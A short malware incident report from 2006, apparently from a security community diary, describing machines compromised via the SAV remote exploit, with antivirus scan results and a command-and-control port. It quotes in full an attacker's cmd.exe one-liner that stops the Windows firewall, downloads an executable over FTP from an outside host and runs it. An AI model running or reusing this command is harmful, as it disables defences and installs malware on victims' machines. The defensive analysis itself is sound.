Thanks to John for this submission:
This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises were:
Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to 184.108.40.206 on tcp port 12345 220.127.116.11 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"
Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from ftpd.3322.org 21211),
the file is then executed and then the x file is deleted.
Running the file through Virustotal gave limited information.
Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET).
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 18.104.22.168 12.14.2006 Win32.Polipos.sus
Fortinet 22.214.171.124 12.14.2006 suspicious
Ikarus T126.96.36.199 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 188.8.131.52 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 184.108.40.206 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
All others reported no virus found!
File size: 12168 bytes
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
John, then reviewed his ids logs looking for traffic on the port 5202 which appears to be the command and control port for this malware and discovered traffic towards 220.127.116.11.
Dec 14th 2006
1 decade ago